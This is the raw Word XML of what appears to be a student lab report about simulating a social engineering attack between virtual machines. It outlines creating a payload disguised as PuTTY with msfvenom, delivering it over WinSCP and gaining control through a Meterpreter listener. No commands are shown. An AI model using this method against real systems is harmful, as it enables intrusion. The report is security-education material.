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DC1C8C" w14:textId="45B1F170" w:rsidR="00281DE9" w:rsidRDefault="00806273">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ABD85B6" wp14:editId="46E6D6BB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764780" cy="10043160"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1517426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42683" name="Picture 15174268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780" cy="1004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02A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="471E8592" wp14:editId="1B592B82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7818120" cy="10027920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="829716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16833" name="Picture 82971683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8120" cy="1002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E25B35" w14:textId="3BBB656A" w:rsidR="00E55398" w:rsidRPr="00304CB2" w:rsidRDefault="00E55398">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Title: Social Engineering Attack Using Metasploit Framework (MSF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461BD8B" w14:textId="0146D139" w:rsidR="00E55398" w:rsidRDefault="00E55398"/>
    <w:p w14:paraId="03A4B59F" w14:textId="1387EB2F" w:rsidR="00E55398" w:rsidRPr="00304CB2" w:rsidRDefault="00304CB2" w:rsidP="00E55398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1</w:t>
      </w:r>
      <w:r w:rsidR="00E55398" w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>.1. Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D85918" w14:textId="3B08FFEB" w:rsidR="00E55398" w:rsidRDefault="00E55398" w:rsidP="00E55398"/>
    <w:p w14:paraId="076F765E" w14:textId="6D029BED" w:rsidR="00E55398" w:rsidRPr="00C86DA6" w:rsidRDefault="00E55398" w:rsidP="00E55398">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The aim of this project is to simulate a social engineering cyberattack using Kali Linux’s Metasploit Framework (MSF). The goal is to demonstrate how attackers create and deliver malicious payloads (disguised as legitimate software) to gain unauthorized access to a system. This simulation enhances understanding of penetration testing, malware behavior, and network defense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06394004" w14:textId="1AD4C48E" w:rsidR="00E55398" w:rsidRPr="00304CB2" w:rsidRDefault="00C86DA6" w:rsidP="00E55398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1</w:t>
      </w:r>
      <w:r w:rsidR="00E55398" w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>.2. Principle (Process &amp; Tools Used)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5987D5" w14:textId="2D544D78" w:rsidR="00E55398" w:rsidRDefault="00E55398" w:rsidP="00E55398"/>
    <w:p w14:paraId="3F0DC92D" w14:textId="60561D53" w:rsidR="00E55398" w:rsidRPr="00C86DA6" w:rsidRDefault="00E55398" w:rsidP="00E55398">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This project follows a realistic ethical hacking methodology involving reconnaissance, payload creation, delivery, and exploitation. The process includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB9E77" w14:textId="00443925" w:rsidR="00E55398" w:rsidRPr="00C86DA6" w:rsidRDefault="00E55398" w:rsidP="00C86DA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86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload creation using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="002AE9EA" w14:textId="555A7DB4" w:rsidR="00E55398" w:rsidRPr="00C86DA6" w:rsidRDefault="00E55398" w:rsidP="00C86DA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86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload delivery using WinSCP (secure file transfer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C6FB5" w14:textId="7A0D39F9" w:rsidR="00E55398" w:rsidRPr="00C86DA6" w:rsidRDefault="00E55398" w:rsidP="00C86DA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86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Execution monitoring through Metasploit Framework (MSF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3620FD" w14:textId="0C69971E" w:rsidR="00E55398" w:rsidRPr="00C86DA6" w:rsidRDefault="00E55398" w:rsidP="00C86DA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86DA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Post-exploitation using Meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C4E89" w14:textId="77777777" w:rsidR="00E55398" w:rsidRDefault="00E55398" w:rsidP="00E55398"/>
    <w:p w14:paraId="4DE2AE61" w14:textId="56FF3183" w:rsidR="00E55398" w:rsidRPr="00721A83" w:rsidRDefault="00E55398" w:rsidP="00E55398">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721A83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Tools used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2FCA69" w14:textId="4A9423CB" w:rsidR="00E55398" w:rsidRPr="00CD0C22" w:rsidRDefault="00E55398" w:rsidP="00CD0C2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D0C22">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali Linux (attacker machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50958FBB" w14:textId="60539FAF" w:rsidR="00E55398" w:rsidRPr="00CD0C22" w:rsidRDefault="00E55398" w:rsidP="00CD0C2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D0C22">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows 10 (target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B7E85B" w14:textId="6A322744" w:rsidR="00E55398" w:rsidRPr="00CD0C22" w:rsidRDefault="00E55398" w:rsidP="00CD0C22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C22">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E59A25A" w14:textId="4A1EAE85" w:rsidR="00E55398" w:rsidRPr="00D46A37" w:rsidRDefault="00E55398" w:rsidP="00D46A37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FB658D8" w14:textId="29A1414F" w:rsidR="00E55398" w:rsidRPr="00D46A37" w:rsidRDefault="00E55398" w:rsidP="00D46A37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D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WinSCP (file transfer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B43F1" w14:textId="2235D3CB" w:rsidR="00E55398" w:rsidRPr="00D46A37" w:rsidRDefault="00E55398" w:rsidP="00D46A37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D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PuTTY / Bad PuTTY (disguised malware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA3690" w14:textId="38428835" w:rsidR="00E55398" w:rsidRPr="00D46A37" w:rsidRDefault="00E55398" w:rsidP="00D46A37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D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Command Prompt (Windows CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F4326" w14:textId="4D090AA9" w:rsidR="00E55398" w:rsidRDefault="00E55398" w:rsidP="00E55398"/>
    <w:p w14:paraId="14503E1C" w14:textId="278CAE5D" w:rsidR="00E55398" w:rsidRPr="00304CB2" w:rsidRDefault="00E55398" w:rsidP="00E55398">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>I.3. Network Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED577B" w14:textId="59AD4B2D" w:rsidR="00806273" w:rsidRDefault="00721A83" w:rsidP="00E55398">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654143" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F07566A" wp14:editId="121CC898">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-38100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5006340" cy="4366260"/>
                <wp:effectExtent l="0" t="0" r="22860" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="1361893114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6340" cy="4366260"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="29B95C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38815D" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t>+----------------+                     +----------------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="50C7B024" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t>|                |   badputty.exe      |                |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="17BD2960" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">|    Kali </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>Linux  |</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">  ----------------</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>&gt;  |</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">   Windows PC   |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4EE9089D" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>|  (</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>msfvenom</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">)   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|  Generate</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> payload   </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>|  Receives</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> file |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5CFC467A" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">|                |                     </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>|  Runs</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> it      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="55288F2F" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t>+----------------+                     +----------------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1009E840" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRPr="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9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t xml:space="preserve">        |                                      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="671FA17C" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">        |                                      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="438301C4" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">        </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>|  Listener</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> (Metasploit multi/handler) |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="13E78F60" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">        |  &lt;----------------------------------|</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3574212E" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">        |                                      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4329AA3E" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">        v                                      </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>v</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="381DAC3D" w14:textId="3074DFC5" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                            <w:r>
                              <w:t xml:space="preserve">  Attacker gets remote control via Meterpreter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07566A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-3pt;margin-top:10.3pt;width:394.2pt;height:343.8pt;z-index:25165414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" fillcolor="#29b95c" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5638815D" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t>+----------------+                     +----------------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="50C7B024" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t>|                |   badputty.exe      |                |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17BD2960" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">|    Kali </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>Linux  |</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">  ----------------</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>&gt;  |</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">   Windows PC   |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4EE9089D" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>|  (</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>msfvenom</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">)   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|  Generate</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> payload   </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>|  Receives</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> file |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5CFC467A" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">|                |                     </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>|  Runs</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> it      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="55288F2F" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t>+----------------+                     +----------------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1009E840" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRPr="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9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t xml:space="preserve">        |                                      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="671FA17C" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">        |                                      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="438301C4" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">        </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>|  Listener</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> (Metasploit multi/handler) |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="13E78F60" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">        |  &lt;----------------------------------|</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3574212E" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">        |                                      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4329AA3E" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">        v                                      </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>v</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="381DAC3D" w14:textId="3074DFC5" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
                      <w:r>
                        <w:t xml:space="preserve">  Attacker gets remote control via Meterpreter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0F70AC" w14:textId="454DEDEC" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t>+----------------+                     +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52624469" w14:textId="634D3B50" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t>|                |   badputty.exe      |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE74664" w14:textId="6F5A8077" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">|    Kali </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Linux  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  ----------------</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&gt;  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   Windows PC   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984206E" w14:textId="4CB03A79" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>|  (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>|  Generate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>|  Receives</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCD4FB" w14:textId="3B622633" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">|                |                     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>|  Runs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE383CA" w14:textId="19C3C970" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t>+----------------+                     +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943B7B9" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">        |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EBF7CC" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">        |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488DFA71" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>|  Listener</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Metasploit multi/handler) |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD96C6" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">        |  &lt;----------------------------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DD59D" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">        |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2698BDE8" w14:textId="77777777" w:rsidR="00A371D9" w:rsidRDefault="00A371D9" w:rsidP="00A371D9">
      <w:r>
        <w:t xml:space="preserve">        v                                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="280CBE3C" w14:textId="7F115EC4" w:rsidR="0079056C" w:rsidRPr="000D5329" w:rsidRDefault="00A371D9" w:rsidP="00806273">
      <w:r>
        <w:t xml:space="preserve">  Attacker gets remote control via Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4823B77A" w14:textId="77777777" w:rsidR="0079056C" w:rsidRDefault="0079056C" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A09291" w14:textId="0BEAC211" w:rsidR="00806273" w:rsidRPr="00304CB2" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>I.4. Materials &amp; Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C238E2E" w14:textId="7A37C1A1" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00806273"/>
    <w:p w14:paraId="2B125BD2" w14:textId="224C87A8" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1 Kali Linux VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A594A59" w14:textId="68E65053" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1 Windows 10 VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8627FA" w14:textId="0DAB9C77" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Installed Metasploit Framework</w:t>
      </w:r>
    </w:p>
